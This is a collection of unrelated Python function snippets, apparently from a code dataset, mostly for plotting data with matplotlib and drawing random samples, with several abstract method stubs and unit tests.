snap.write_int('rst',0)\n\n ## Test\n if (test):\n if ant in [2,3,6,7,10,11]:\n test = (np.linspace(256,511,num=256,dtype='uint64')**2)*(ACC_LEN/256)\n else:\n test = (np.linspace(0,255,num=256,dtype='uint64')**2)*(ACC_LEN/256)\n plt.plot(test,'.',label='test')\n \n ## Wait for vector to get accumulated\n time.sleep(ACC_LEN/(512*200e6)*1e3)\n arr = struct.unpack('>256Q',snap.read('spectrum',8*256))\n if (freq):\n plt.plot(FREQ,arr,'.-',lw=1,label='%s'%ANT_LABELS[ant])\n plt.xlim(FREQ.max(), FREQ.min())\n else:\n plt.plot(arr,lw=2,label='%s'%ANT_LABELS[ant])", "def make_plot(x,y):", "def plot(self, subsample=None, valid_instance_types=None):\n pt = self.sample_indices(subsample, valid_instance_types)\n\n x, y, z = self.pc[pt, 0], self.pc[pt, 1], self.pc[pt, 2]\n color = self.color[pt]\n\n return plot_pointcloud(x, y, z, color=color)", "def plot(self, show=True):\n xs, ys = zip(*[(float(ix)/self.sample_rate, val)\n for ix, val in enumerate(self.samples)])\n plt.plot(xs, ys)\n if show:\n plt.show()", "def draw_random_sample(choices, probabilities, n):\n values = np.array(range(len(choices)))\n probs = np.array(probabilities)\n bins = np.add.accumulate(probs)\n inds = values[np.digitize(random_sample(n), bins)]\n samples = []\n for i in inds:\n samples.append(deepcopy(choices[int(i)]))\n return samples", "def plotRandImages(train_data, output):\n rint_array = np.random.randint(0,train_data.shape[0],size=4)\n\n fig = plt.figure(figsize=(8,8))\n plt.subplot(2,2,1)\n for ii,rint in enumerate(rint_array):\n plt.subplot(2,2,ii+1)\n img = train_data[rint].reshape((20,20)).T\n #print \" output: \",output[rint]\n plt.imshow(img,aspect='auto',interpolation='nearest',\n origin='lower')\n plt.title('Image of %d'%output.T[rint])\n plt.show()\n\n return", "def draw_random_sample(n, probabilities, k):\n # sets up an index list for the chosen particles, and makes bins for the probabilities\n values = np.array(range(len(n)))\n probabilities = np.array(probabilities)\n bins = np.add.accumulate(probabilities)\n new_values = values[np.digitize(random_sample(n), bins)] # choose the new particles based on the probabilities of the old ones\n samples = []\n for i in new_values:\n samples.append(deepcopy(n[int(i)])) # make a new particle cloud\n return samples", "def draw_sample(self, samp_pts=None, means=None, covar=None):\n raise NotImplementedError('Abstract Method')", "def plot_scatter(chimera, singles, chisum, lorder, figname, mincount):\n def scatit(dname, dname2, grd, i, j, l1, l2, lln, cur_name):\n \"\"\"\n scatterplot the specific plot\n \"\"\"\n lkeys = set(dname[l1].keys()) & set(dname2[l2].keys())\n xvec = []\n yvec = []\n for k in lkeys:\n if dname[l1][k] > mincount or dname2[l2][k] > mincount:\n xvec.append(dname[l1][k]+1)\n yvec.append(dname2[l2][k]+1)\n spr = spearmanr(xvec, yvec)\n #print \"*\" * 100\n #my addition - print to stdout the pairs and the values\n # print cur_name, l1, l2, spr[0] ,spr[1]\n im = grd[i*lln + j].hexbin(\n xvec, yvec, xscale = 'log', yscale = 'log', bins='log', mincnt=1,\n gridsize=(50,50))\n# grd.cbar_axes[i*lln+j].colorbar(im)\n\n grd[i*lln + j].text(10, 10e4, \"r=%.2f\"%(spr[0]), size=6, color='m')\n grd[i*lln + j].set_xlim([10e0, 10e5])\n grd[i*lln + j].set_ylim([10e0, 10e5])\n grd[i*lln + j].set_yscale('log')\n grd[i*lln + j].set_xscale('log')\n grd[i*lln + j].set_xticks([10e0, 10e2, 10e4])\n# grd[i*lln + j].set_xticklabels([k[0] for k in grd[i*lln + j].get_xticklabels()], rotation=45)\n grd[i*lln + j].set_yticks([10e0, 10e2, 10e4])\n grd[i*lln + j].set_ylabel(l1)\n grd[i*lln + j].set_xlabel(l2, rotation=45)\n# tight_layout()\n return spr\n lln = len(lorder)\n corrs = zeros((lln, lln))\n fig = figure(1, (8, 8), 300)\n rcParams.update({'font.size': 8})\n# f, axarr = subplots(lln, lln, sharex=True, sharey=True)\n grid = ImageGrid(fig, 111, # similar to subplot(111)\n nrows_ncols = (lln, lln), # creates 2x2 grid of axes\n axes_pad=0.1, # pad between axes in inch.\n aspect=True,\n# cbar_mode=\"each\"\n ) \n for i, l1 in enumerate(lorder):\n for j, l2 in enumerate(lorder):\n if i>j: # Print singles\n corrs[i, j] = scatit(\n singles, singles, grid, i, j, l1, l2, lln, \"sing-sing\")[0]\n elif i==j:\n corrs[i, j] =scatit(singles, chisum, grid, i, j, l1, l2, lln, \"sing-chim\")[0]\n else:\n corrs[i, j] = scatit(\n chimera, chimera, grid, i, j, l1, l2, lln, \"chim-chim\")[0]\n xlabel(l1)\n ylabel(l2)\n rcParams.update({'font.size': 8})\n for ax in fig.get_axes():\n ax.tick_params(which='minor', direction='out')\n savefig(figname, dpi=300)\n return corrs", "def plot(self, *args):\n return self.vocab().plot(*args)", "def show_rand_conn(random_conn_parameters):\n\n fig = plt.figure(figsize=(8.5, 8.5))\n ax = fig.add_subplot(111)\n colors = cm.rainbow(np.linspace(\n 0, 1, random_conn_parameters['nb_random_conn']))\n\n for x_pix, z_pix, x_neigh, z_neigh, c in zip(\n random_conn_parameters['x_pixel'], random_conn_parameters['z_pixel'],\n random_conn_parameters['x_neigh'], random_conn_parameters['z_neigh'], colors):\n ax.scatter(x_pix, z_pix, color=c)\n ax.scatter(x_neigh, z_neigh, color=c)\n ax.plot([x_pix, x_neigh], [z_pix, z_neigh], color=c, linewidth=1)\n\n plt.title('Random connectivity')\n ax.set_xlabel('X (pixel)')\n ax.set_ylabel('Z (pixel)')\n plt.show()\n\n return", "def draw_sample(self, samp_pts=None, means=None, covar=None):\n return self.gp_core.draw_samples(1, X_test=samp_pts, mean_vals=means,\n covar=covar).ravel()", "def main():\n # Initialize the Serpinski set\n print(\"==> Making serpinski set...\")\n my_serpinski = Serpinski(400, 400, 0)\n num = 8\n print(\"==> Generating\", num, \"levels of subsets :)\")\n for _ in range(9):\n my_serpinski.add_subset()\n # Draw Serpinski\n # print(\"==> Drawing the set. This might take quite some time!\\\n # Damn Inefficient!\")\n # my_serpinski.draw_me()\n\n # Initialize Coordinates\n length = 50000 # Number of random dots\n x_coord = []\n y_coord = []\n index = 0\n\n # try length particles in serp set\n print(\"==> Randomly choosing\", length, \"dots...\")\n while index < length:\n # Chech if dot in bound\n rand_y = np.random.uniform(low=400.0 - 200.0 * np.sqrt(3) / 2.0,\n high=400.0)\n # rand_x in triangle // condition //\n diff = 400.0 - rand_y\n x_diff = diff / np.sqrt(3)\n rand_x = np.random.uniform(low=400.0 - x_diff,\n high=400 + x_diff)\n\n if my_serpinski.is_bound(rand_x, rand_y):\n x_coord.append(rand_x)\n y_coord.append(rand_y)\n index += 1\n\n # Draw image using scatter\n print(\"Scattering the dots ;)\")\n plt.scatter(x_coord, y_coord, s=0.1)\n # Show image\n dpi = 600\n print(\"==> Saving to .jpg with dpi=\", dpi)\n plt.savefig(\"fractalstuff.jpg\", dpi=dpi, bbox_inches='tight')", "def jax_display_samples(ax, x, color):\n kde = KernelDensity(kernel=\"gaussian\", bandwidth=0.005).fit(x)\n t_plot = np.linspace(-0.1, 1.1, 1000)[:, np.newaxis]\n dens = np.exp(kde.score_samples(t_plot))\n dens = jax.ops.index_update(dens, jax.ops.index[np.array([0,-1])], [0,0])\n ax.fill(t_plot, dens, color=color)", "def sample(self, x):", "def sample(self, observation):\n raise NotImplementedError", "def plot_ordination(res, choices=[1,2],\n axis_names='PC', constrained_names=None,\n samples_kw={}, species_kw={}, centroids_kw={}, biplot_kw={},\n axline_kw={}):\n choices = asarray(choices) -1\n samples, species, centroids, biplot, evals = [asarray(res.get(k, None))\n for k in ['samples', 'species', 'centroids', 'biplot', 'eigvals']]\n if isinstance(axis_names, str):\n axis_names = ['%s%i' % (axis_names, i+1) for i in range(len(evals))]\n # draw the axis lines\n axline_kw = dict({'color':'gray'}, **axline_kw)\n pylab.axvline(**axline_kw)\n pylab.axhline(**axline_kw)\n # calc percentages from evals and label them\n evals = asarray(evals)\n evals[evals<0] = 0\n percs = 100 * (evals / evals.sum())\n pylab.xlabel('%s - %.2f%%' % (axis_names[choices[0]], percs[choices[0]]))\n pylab.ylabel('%s - %.2f%%' % (axis_names[choices[1]], percs[choices[1]]))\n #plot the speceies points in red +\n if any(species):\n species_kw = dict({'cml': 'r+', 'label_kw':{'size':'smaller'}},\n **species_kw) #set default\n plot_points(species[:, choices], **species_kw)\n # scatter the sample points in black\n default = {'c': 'k', 's': 50, 'alpha': 0.5, 'label_kw': {'size': 'medium'}}\n scatter_points(samples[:, choices], **dict(default, **samples_kw))\n # scatter the centroids\n if any(centroids):\n default = {'c':'b', 's':0, 'label': 'X', 'label_kw':{'size':'larger',\n 'color':'b', 'ha':'center', 'va':'center'}}\n scatter_points(centroids[:, choices], **dict(default, **centroids_kw))\n # arrow the biplot points\n if any(biplot):\n default = {'c':'b', 'label_kw':{'size':'larger', 'color':'b'}}\n arrows([[0,0]] * len(biplot), biplot[:, choices],\n **dict(default, **biplot_kw))\n # calc the constrained percentage and title it\n if constrained_names:\n if isinstance(constrained_names, str): #a prefix\n constrained_names = [n for n in axis_names if\n n.startswith(constrained_names)]\n con_idxs = [i for i, n in enumerate(axis_names)\n if n in constrained_names]\n con_perc = percs[con_idxs].sum()\n pylab.title('%.2f%% constrained' % con_perc)", "def sample(self, point, n_samples=1):\n raise NotImplementedError(\"The sample method is not yet implemented.\")", "def plot_data(self):", "def plot_individual(xdict, ydict, xprop, yprop, documents, spline):\n figure_array = {}\n for item in documents:\n xlabel = \"\\\\textbf{\" + label_dict[xprop] + \"}\"\n ylabel = \"\\\\textbf{\" + label_dict[yprop] + \"}\"\n x = xdict[item[\"path_id\"]]\n y = ydict[item[\"path_id\"]]\n # fig_title = item[\"path_id\"] + \"(\" + item[\"pretty_formula\"] + \")\" # Individual traces\n # fig_title = yprop + item[\"cation_type\"] # Plot by cation\n fig_title = yprop # All together\n figure_array[item[\"path_id\"]] = plt.figure(fig_title, figsize=(6,6), dpi=plotting_dpi)\n ax = figure_array[item[\"path_id\"]].add_subplot(111) \n ax.scatter(x,y, s=70, zorder=2, color=color_dict[item[\"cation_type\"]], linewidths=2.5, edgecolors='black')\n if spline:\n tck = interpolate.splrep(x, y, s=0)\n xnew = np.arange(0, 100, 0.1)\n splfit = interpolate.splev(xnew, tck, der=0)\n x = xnew\n y = splfit\n if item[\"path_id\"][-3:] == \"002\":\n ax.plot(x,y, linewidth=2.5, zorder=1, color=color_dict[item[\"cation_type\"]], linestyle='dashed')\n elif item[\"path_id\"][-3:] == \"003\":\n ax.plot(x,y, linewidth=2.5, zorder=1, color=color_dict[item[\"cation_type\"]], linestyle='dotted')\n else:\n ax.plot(x,y, linewidth=2.5, zorder=1, color=color_dict[item[\"cation_type\"]])\n ax.set_xlabel(xlabel, fontsize=24)\n # ax.set_ylim([0,1200])\n # ax.set_xlim([0,100])\n ax.set_ylabel(ylabel, fontsize=24)\n ax.tick_params(axis='x', labelsize=22)\n ax.tick_params(axis='y', labelsize=22)\n border_width = 2\n [i.set_linewidth(border_width) for i in ax.spines.itervalues()]\n plt.tight_layout()\n plt.legend(loc='best', prop={'size': 14})\n plt.rc('text', usetex=True)\n plt.rc('font', family='sans-serif')\n plt.tight_layout()\n plt.show()", "def plot(self):\n\t\tself.plotOfSpect()", "def sample(self, num_samples, **kwargs):\n pass", "def sample_selection(attr, old, new):\n if len(new) == 0:\n source.data = source.from_df(merged_data)\n else:\n samples = [s+1 for s in new]\n selected_data = merged_data.loc[merged_data['sample_num'].isin(samples)]\n source.data = source.from_df(selected_data)\n z = np.linspace(min(source.data['redshift']), max(source.data['redshift']), 100)\n cosmo_distmod_range = cosmo.distmod(z=z).value\n source.data['z_range'] = z\n source.data['cosmo_distmod_range'] = cosmo_distmod_range", "def visualize_samples(samples, discretized_samples, grid, low=None, high=None):\n\n fig, ax = plt.subplots(figsize=(10, 10))\n\n # Show grid\n ax.xaxis.set_major_locator(plt.FixedLocator(grid[0]))\n ax.yaxis.set_major_locator(plt.FixedLocator(grid[1]))\n ax.grid(True)\n\n # If bounds (low, high) are specified, use them to set axis limits\n if low is not None and high is not None:\n ax.set_xlim(low[0], high[0])\n ax.set_ylim(low[1], high[1])\n else:\n # Otherwise use first, last grid locations as low, high (for further mapping discretized samples)\n low = [splits[0] for splits in grid]\n high = [splits[-1] for splits in grid]\n\n # Map each discretized sample (which is really an index) to the center of corresponding grid cell\n # add low and high ends\n grid_extended = np.hstack((np.array([low]).T, grid, np.array([high]).T))\n # compute center of each grid cell\n grid_centers = (grid_extended[:, 1:] + grid_extended[:, :-1]) / 2\n locs = np.stack(grid_centers[i, discretized_samples[:, i]]\n for i in range(len(grid))).T # map discretized samples\n\n ax.plot(samples[:, 0], samples[:, 1], 'o') # plot original samples\n # plot discretized samples in mapped locations\n ax.plot(locs[:, 0], locs[:, 1], 's')\n # add a line connecting each original-discretized sample\n ax.add_collection(mc.LineCollection(\n list(zip(samples, locs)), colors='orange'))\n ax.legend(['original', 'discretized'])", "def show(data_set, number_points: int):\n print(f'info: Showing {number_points} as maximum.')\n sub_set_points = np.random.choice(range(data_set.shape[0]), size=min(data_set.shape[0], number_points))\n x = data_set[sub_set_points, 0]\n y = data_set[sub_set_points, 1]\n z = data_set[sub_set_points, 2]\n\n fig = plt.figure(figsize=(8, 8))\n ax = mplot3d.Axes3D(fig)\n ax.set_title('NMSLIB index 3D representation', fontsize=20)\n ax.scatter(xs=x, ys=y, zs=z)\n plt.show()", "def plot():\n pass", "def not_pokemon_function():\n # Ironic I'm using random inside seed\n numpy.random.seed(random.randint(1, 1000))\n sample = numpy.random.normal(size=1000)\n counts, bin_edges = numpy.histogram(sample, bins=39)\n fig = tpl.figure()\n fig.hist(counts, bin_edges, grid=[15, 25], force_ascii=False)\n fig.show()\n print(\"Hopefully this random histogram(because I couldn't generate plot graphs) which is generated cheers you up\")", "def sample(self):", "def cli(sample, title, dpi, out):\n click.echo('\\n' + '.' * 50)\n\n # reading the CDT file.\n try:\n signalData = pd.read_csv(sample, sep='\\t', index_col=0)\n except IOError:\n print(\"\\nUnable to OPEN input files !\\n\")\n sys.exit(1)\n\n # prepare PlotData, remove extra decimal values\n signalData = signalData.round(decimals=3)\n\n # General DEBUG\n print(signalData.index)\n print(signalData.shape)\n\n # retrieve the row index from the dataframe\n rowIndex = list(signalData.index)\n\n # retrieve data for Sense strand\n sx = list(signalData.loc[rowIndex[0]])\n\n # retrieve values for y axis and convert them to float\n sy = list(signalData.columns)\n sy = list(map(float, sy))\n\n # prepare PlotData for antisense strand\n cx = list(signalData.loc[rowIndex[1]])\n\n # convert antisense data values to negative, to plot it below the sense data.\n x1 = [-i for i in cx]\n\n fig, ax = plt.subplots()\n # ax = plt.axes([0, 0, 1, 1])\n\n plt.plot(sy, sx, 'b', sy, x1, 'r') # plotting the graph\n\n # adding the fill color for both the strands.\n d = numpy.zeros(len(sx))\n d1 = numpy.zeros(len(sx))\n plt.fill_between(sy, sx, where=sx >= d, interpolate=False, color=\"blue\")\n plt.fill_between(sy, x1, where=sx >= d1, interpolate=False, color=\"red\")\n\n # Option to draw a vertical line at origin on x-axis\n # plt.axvline(x=0, color='black', linestyle='--')\n\n # creating the grid lines\n # plt.grid(linestyle='--', linewidth=0.5)\n\n plt.gca().xaxis.grid(True, linestyle='--', linewidth=0.5)\n\n # adding custom xticks and yticks\n plt.xticks(range(-100, 150, 50), fontsize=14)\n\n # retrieve the yticks\n my_yticks = ax.get_yticks()\n # pprint.pprint(my_yticks)\n lastTick = int(len(my_yticks) - 1)\n\n # Handle edge cases, not to round off to -0.0\n if my_yticks[0] <= -1.0:\n # setting the ylim for the y-axis\n ax.set_ylim(math.ceil(my_yticks[0]), math.ceil(my_yticks[lastTick]))\n # setting the ticks for y-axis\n plt.yticks([math.ceil(my_yticks[0]), 0, math.ceil(\n my_yticks[lastTick])], fontsize=14)\n else:\n # setting the ylim for the y-axis\n ax.set_ylim(my_yticks[0], math.ceil(my_yticks[lastTick]))\n # setting the ticks for y-axis\n plt.yticks([my_yticks[0], 0, math.ceil(\n my_yticks[lastTick])], fontsize=14)\n\n plt.ylabel('Tags', fontsize=18)\n\n # setting the padding space between the y-axis label and the y-axis\n if math.ceil(my_yticks[lastTick]) < 10:\n ax.yaxis.labelpad = -10\n else:\n ax.yaxis.labelpad = -15\n\n # to increase the width of the plot borders and tick width\n plt.setp(ax.spines.values(), linewidth=2)\n plt.tick_params(length=8, width=2)\n\n # if you chose to not include the xticks , since they are similar to heatmap x-axis ticks\n # plt.xticks([-100,0,100])\n ax.xaxis.set_major_formatter(NullFormatter())\n ax.xaxis.set_ticks_position('none')\n\n # plt.yticks(range(-10,12,2))\n # plt.xticks([-500,0,500])\n\n # start,end=ax.get_ylim()\n # ax.set_ylim(start-1,end+1)\n\n # Customizing the border/ spines on each side of the plot.\n # frame1 = plt.gca()\n # frame1.axes.xaxis.set_ticklabels([])\n # frame1.axes.yaxis.set_ticklabels([])\n # frame1.axes.spines['top'].set_visible(False)\n # frame1.axes.spines['right'].set_visible(False)\n # frame1.axes.spines['bottom'].set_visible(False)\n # frame1.axes.spines['left'].set_visible(False)\n\n # plt.show()\n plt.title(title, fontsize=25)\n # setting the margins\n plt.margins(0.01)\n\n # saving the image at 300dpi , web standard for printing images.\n plt.savefig(out, facecolor=None, dpi=dpi, pad_inches=0)\n click.echo('\\n' + '.' * 50)", "def test_simple(make_plots=False):\n # Define the example you want to investigate:\n r1 = GeneralRandom(np.arange(10), np.ones(10), 100)\n r2 = GeneralRandom(np.arange(5), np.ones(5), 20)", "def _sample_vdisp(logvdisp_meansig, nmodel=1, rand=None):\n if rand is None:\n rand = np.random.RandomState()\n\n fracvdisp = (0.1, 40)\n\n nvdisp = int(np.max( ( np.min( ( np.round(nmodel * fracvdisp[0]), fracvdisp[1] ) ), 1 ) ))\n vvdisp = 10**rand.normal(logvdisp_meansig[0], logvdisp_meansig[1], nvdisp)\n vdisp = rand.choice(vvdisp, nmodel)\n\n return vdisp", "def sample(self, nsamples=1, weighted=True):\n weights = self.areas / np.sum(self.areas) if weighted else None\n index = np.random.choice(a=len(self.geometries), size=nsamples, p=weights)\n\n labels = []\n rows = []\n cols = []\n for idx in index:\n polygon = self.geometries[idx]['polygon']\n label = self.geometries[idx]['label']\n point = PointSampler.random_point(polygon.envelope.bounds)\n if PointSampler.contains(polygon, point):\n labels.append(label)\n rows.append(int(point.y))\n cols.append(int(point.x))\n # samples.append({'label':label, 'row':point.y, 'col':point.x})\n\n return labels, rows, cols", "def test_plot(arg):\n source_data = data.Biofile(arg)\n sample = source_data.get_header()\n feature = source_data.get_index()\n sample_size, feature_size = 106, 12042\n sample = sample[:sample_size]\n #xshape = (106 12042)\n print(sample, feature)\n X = source_data.get_matrix().T[:sample_size, :feature_size]\n mx = 100\n labs = ['rbf','poly','sigmoid']\n semi_r = util.kernel_non_negative_factorization(X.T,n_components=2, max_iter = mx, parameter = 100) #rbf 0.5\n semi_r_con = util.kernel_non_negative_factorization(X.T,n_components=2, max_iter = mx, kernel='poly', parameter= 0.5)#ploy 2\n semi_r_con1 = util.kernel_non_negative_factorization(X.T,n_components=2, max_iter=mx, kernel='sigmoid', parameter= 0.1) #sigmoid 0.5\n semi_r_con2 = util.convex_non_negative_factorization(X.T, max_iter=mx, n_components=2)\n\n #semi_r = util.semi_non_negative_factorization_with_straint(X.T, max_iter = mx,n_components=2 ,initialization= 'Kmeans',alpha = 0.01, beta = 0.01)\n #semi_r_con = util.semi_non_negative_factorization_with_straint(X.T, max_iter=mx,n_components=2 ,initialization= 'Kmeans',alpha= 10, beta = 10)\n #semi_r_con1 = util.semi_non_negative_factorization_with_straint(X.T, max_iter=mx,n_components=2, initialization= 'Kmeans',alpha= 0, beta = 10)\n #semi_r_con2 = util.semi_non_negative_factorization_with_straint(X.T, max_iter=mx,n_components=2, initialization= 'Kmeans',alpha= 10, beta = 0)\n #convex_r_con = util.convex_non_negative_factorization(X.T, n_components=2, max_iter=mx)\n\n G, G1, G2, G3 = semi_r[1], semi_r_con[1], semi_r_con1[1], semi_r_con2[1]\n result, result1, result2, result3 = semi_r[2], semi_r_con[2], semi_r_con1[2], semi_r_con2[2]\n x = [i for i in range(mx)]\n # plot the losses function\n plt.title(\"losses function of {}\".format(arg[:-4]))\n plt.xlabel(\"iteration times\")\n plt.ylabel(\"losses\")\n\n plt.plot(x, result[:mx], 'r', marker = '.', label = 'kNMF({})'.format(labs[0]))\n plt.plot(x, result1[:mx], 'b', marker ='.' , label = 'kNMF({})'.format(labs[1]))\n plt.plot(x, result2[:mx], 'c', marker ='.', label = 'kNMF({})'.format(labs[2]))\n plt.plot(x, result3[:mx], 'm', marker ='.', label = 'cvxnmf')\n \"\"\"\n plt.plot(x, result[:mx], 'r', marker = '.', label = 'sNMF')\n plt.plot(x, result1[:mx], 'b', marker ='.' , label = 'sNMF(0.5,0.5)')\n plt.plot(x, result2[:mx], 'c', marker ='.', label = 'sNMF(0,0.5)')\n plt.plot(x, result3[:mx], 'm', marker ='.', label = 'sNMF(0.5,1)')\n plt.plot(x, result4[:mx], 'k', marker = '.', label = 'cvx-NMF')\n \"\"\"\n plt.legend(bbox_to_anchor=[1,1])\n plt.grid()\n plt.show()\n\n #plot the clustering result\n plt1 = plt\n plt1.subplot(221)\n plt1.plot(G[:,0], G[:,1], 'ro')\n plt1.title(u'the distribution of items(knmf({}))'.format(labs[0]))\n #items = zip(sample, G)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.subplot(222)\n plt1.plot(G1[:,0], G1[:,1], 'bo')\n\n plt1.title(u'the distribution of items(knmf({}))'.format(labs[1]))\n\n #items = zip(sample, G1)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.subplot(223)\n plt1.plot(G2[:,0], G2[:,1], 'co')\n plt1.title(u'the distribution of items((knmf({}))'.format(labs[2]))\n #items = zip(sample, G4)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.subplot(224)\n plt1.plot(G3[:,0], G3[:,1], 'mo')\n plt1.title(u'the distribution of items(convex-nmf))')\n #items = zip(sample, G2)\n #for item in items:\n # item_name, item_data = item[0], item[1]\n # plt1.text(item_data[0], item_data[1], item_name,\n # horizontalalignment='center',\n # verticalalignment='top')\n\n plt1.show()", "def random_simulation(self, title, simulation=False):\n\n counter = 0\n plt.figure()\n\n # plot each battery\n for battery in self.grid.batteries:\n plt.plot(battery.x, battery.y, marker='x', color=colors[counter],\n markersize=10)\n x = []\n y = []\n for house in battery.connections:\n x.append(house.x)\n y.append(house.y)\n plt.scatter(x, y, marker='p', color=colors[counter])\n counter += 1\n\n # plot the connection\n counter = 0\n for battery in self.grid.batteries:\n for house in battery.connections:\n curr_x, curr_y = house.x, house.y\n end_x, end_y = battery.x, battery.y\n if curr_x > end_x:\n x_step = -1\n else:\n x_step = 1\n if curr_y > end_y:\n y_step = -1\n else:\n y_step = 1\n while not curr_x == end_x and not curr_y == end_y:\n if random.random() < 0.5:\n plt.plot([curr_x, curr_x], [curr_y, curr_y + y_step],\n color=colors[counter], linewidth=.3)\n curr_y = curr_y + y_step\n else:\n plt.plot([curr_x, curr_x + x_step], [curr_y, curr_y],\n color=colors[counter], linewidth=.3)\n curr_x = curr_x + x_step\n plt.plot([curr_x, end_x], [curr_y, end_y],\n color=colors[counter], linewidth=.3)\n counter += 1\n\n # display the process in an animation\n if simulation:\n plt.pause(1)\n plt.draw()", "def test_sampling(self):\n dim = Fidelity(\"epoch\", 1, 2)\n assert dim.sample() == [2]\n dim = Fidelity(\"epoch\", 1, 5)\n assert dim.sample() == [5]\n dim = Fidelity(\"epoch\", 1, 5)\n assert dim.sample(4) == [5] * 4", "def sample(self):\n raise NotImplementedError", "def sample(self):\n raise NotImplementedError", "def draw(probs, occ_rep, Nsamp):\n Ns, L = occ_rep.shape\n shots= np.empty((Nsamp,L))\n results = np.random.choice(list(range(len(probs))), Nsamp, p=probs)\n for ii in range(Nsamp):\n shots[ii, : ] = occ_rep[results[ii], :]\n return shots", "def test_sample(self):\n seed = 5\n space = Space()\n probs = (0.1, 0.2, 0.3, 0.4)\n categories = (\"asdfa\", 2, 3, 4)\n dim1 = Categorical(\"yolo\", OrderedDict(zip(categories, probs)), shape=(2, 2))\n space.register(dim1)\n dim2 = Integer(\"yolo2\", \"uniform\", -3, 6)\n space.register(dim2)\n dim3 = Real(\"yolo3\", \"norm\", 0.9)\n space.register(dim3)\n\n point = space.sample(seed=seed)\n rng = check_random_state(seed)\n test_point = [\n dict(\n yolo=dim1.sample(seed=rng)[0],\n yolo2=dim2.sample(seed=rng)[0],\n yolo3=dim3.sample(seed=rng)[0],\n )\n ]\n assert len(point) == len(test_point) == 1\n assert len(point[0].params) == len(test_point[0]) == 3\n assert np.all(point[0].params[\"yolo\"] == test_point[0][\"yolo\"])\n assert point[0].params[\"yolo2\"] == test_point[0][\"yolo2\"]\n assert point[0].params[\"yolo3\"] == test_point[0][\"yolo3\"]\n\n points = space.sample(2, seed=seed)\n rng = check_random_state(seed)\n points1 = dim1.sample(2, seed=rng)\n points2 = dim2.sample(2, seed=rng)\n points3 = dim3.sample(2, seed=rng)\n test_points = [\n dict(yolo=points1[0], yolo2=points2[0], yolo3=points3[0]),\n dict(yolo=points1[1], yolo2=points2[1], yolo3=points3[1]),\n ]\n assert len(points) == len(test_points) == 2\n for i in range(2):\n assert len(points[i].params) == len(test_points[i]) == 3\n assert np.all(points[i].params[\"yolo\"] == test_points[i][\"yolo\"])\n assert points[i].params[\"yolo2\"] == test_points[i][\"yolo2\"]\n assert points[i].params[\"yolo3\"] == test_points[i][\"yolo3\"]", "def random_sample(self, n):\n indices = random.sample(xrange(np.shape(self.data)[0]), n)\n table = DataTable(self.data[indices], self.dims, self.legends, self.tags.copy())\n return table", "def plot_random_faces(faces):\n selects = np.random.random_integers(0, 20000, 16)\n plt.figure()\n for k in range(16):\n plt.subplot(4, 4, k+1)\n plot_face(faces.data[selects[k]])\n if faces.target[k] == 1:\n plt.title('smile')\n else:\n plt.title('ugly')", "def varying_noise_continuous_ndim_without_category(self, figure, iteration, order, total_continuous_dim, result_path):\n\n continuous_sample_points = np.linspace(-2.0, 2.0, 20)\n #a specific noise factor will be varied with 10 steps.\n\n num_points, steps = 10, len(continuous_sample_points)\n # each step has points with randomly-sampled other noise factor\n\n\n continuous_noise = []\n for _ in range(num_points):\n cur_sample = np.random.normal(size=[1, total_continuous_dim])\n continuous_noise.extend([cur_sample]*steps)\n continuous_noise = np.concatenate(continuous_noise)\n\n varying_factor = np.tile(continuous_sample_points, num_points)\n continuous_noise[:, order] = varying_factor \n continuous_noise = np.float32(continuous_noise)\n \n display_images = []\n with variable_scope.variable_scope(self.gen_scope.name, reuse = True):\n varying_data = self.generator(continuous_noise)\n\n #colors = cm.rainbow(np.linspace(0, 1, len(continuous_sample_points)))\n colors = [ ( 1/(i%steps + 1), 0, (i%steps + 1)/steps, 1) for i in range( continuous_noise.shape[0] )] #red to green\n\n scales = [ (1.1**(i%steps + 1))*10 for i in range( continuous_noise.shape[0] )]\n\n gen_data_test = self.sess.run(varying_data)\n ax1 = figure\n ax1.scatter(gen_data_test[:, 0], gen_data_test[:, 1], s=scales, c=(0, 0, 0))\n\n for i, factor in enumerate(continuous_noise[:, order]):\n ax1.annotate(str(round(factor, 2)), (gen_data_test[i, 0], gen_data_test[i, 1]), color=colors[i])", "def sample(self, nsample=None, **kwargs):\n if len(kwargs) > 0:\n self.update(**kwargs)\n # draw a zred from pdf(z)\n zred = self.zred_dist.sample()\n\n # draw from the mass function at the above zred\n cdf_mass = cdf_mass_func_at_z(z=zred, logm=self.mgrid, const_phi=self.params['const_phi'], bounds=[self.params['mass_mini'], self.params['mass_maxi']])\n mass = draw_sample(xs=self.mgrid, cdf=cdf_mass)\n\n # given mass from above, draw logzsol\n met_dist = priors.FastTruncatedNormal(a=self.params['z_mini'], b=self.params['z_maxi'],\n mu=loc_massmet(mass), sig=scale_massmet(mass))\n met = met_dist.sample()\n\n return np.array([zred, mass, met])", "def sample(self, n):\n raise NotImplementedError", "def test_plot_timeseries_multivariate(tmpdir, random):\n x = np.linspace(start=0, stop=10, num=20)\n ys = np.stack((np.sin(x), np.cos(x), np.tan(0.4 * x)))\n segments = get_test_segments(data=ys)\n output_path = Path(tmpdir) / 'temp_visualization_test_multivariate.png'\n\n plot_timeseries(x=x,\n y=ys.T,\n segments=segments,\n show_plot=False,\n output_filename=output_path)\n\n assert output_path.exists()", "def plotting_helper_method(x_axis, y_axis, df):\n genre_dict = {\n 'g':'Rock',\n 'b':'Hip-Hop',\n 'r':'Pop'\n }\n for color, genre in genre_dict.items():\n filtered_df = df[df['genre'] == genre]\n plt.scatter(filtered_df[x_axis], filtered_df[y_axis], c=color, label=genre)", "def sample (self, n):\n y = self.bins\n x = np.r_[0, self.values.cumsum ()] / self.sum\n # interpolate inverse CDF\n out = np.interp (np.random.random (n), x, y)\n if n == 1:\n return out[0]\n else:\n return out.reshape ((n,))", "def test_sampler():\n L = 25 # Lattice size\n beta = 0.1 # Inverse temperature\n h = 1E-2 # Step size\n n = 10 # Number of velocity verlet steps.\n Nsteps = int(1E4) # Number of MCMC steps\n\n # First plot the spins on the circle for large beta.\n\n # Get points on the circle.\n angle = np.linspace(0, 2*np.pi, 1000)\n circle = [np.cos(angle), np.sin(angle)]\n\n # Sample from the model and get the spin vectors.\n xy = HybridMC(L, beta, h, n, 